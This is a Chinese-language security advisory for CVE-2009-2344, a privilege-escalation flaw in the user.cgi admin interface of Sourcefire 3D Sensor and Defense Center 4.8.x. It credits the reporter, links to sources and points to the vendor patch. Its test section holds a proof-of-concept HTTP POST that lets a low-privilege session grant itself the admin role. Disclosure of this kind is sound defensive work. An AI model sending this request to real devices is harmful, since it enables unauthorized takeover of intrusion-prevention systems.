发布日期：2009-07-02
更新日期：2009-07-03

受影响系统：

Sourcefire 3D Sensor 4.8.x
Sourcefire Defense Center 4.8.x

不受影响系统：

Sourcefire 3D Sensor 4.8.2
Sourcefire Defense Center 4.8.2

描述：

---

BUGTRAQ  ID: 35553
CVE(CAN) ID: CVE-2009-2344

Sourcefire 3D Sensor和Defense Center都是流行的网络入侵保护系统。

3D Sensor和Defense Center的web管理界面存在权限提升漏洞，允许任意本地账号获得设备的管理员角色。尽管user.cgi PERL脚本正确地验证了入站请求属于已认证的会话，在这种情况下没有考虑请求发起者的角色而盲目的给予了读写访问，因此即使是最低访问级别的用户（如没有配置任何角色的用户）也可以将其提升为管理员并随意更改其他角色或账号参数。

<*来源：Gregory Duchemin （c3rb3r@hotmail.com）
  
  链接：http://marc.info/?l=bugtraq&m=124654600802443&w=2
        http://secunia.com/advisories/35658/
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

POST https://x.x.x.x/admin/user/user.cgi HTTP/1.1
User-Agent: xxxxxx
Keep-Alive: 300
Connection: Keep-alive
Cookie: CGISESSID=xxxxxxxxxxxxxxxxxx
Content-Type: application/x-www-form-urlencoded
Content-length: 56

mode=edit&username=foobar&admin=%24admin&action_add=Save

建议：

---

厂商补丁：

Sourcefire
----------
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：

https://support.sourcefire.com/

浏览次数：3009
严重程度：0（网友投票）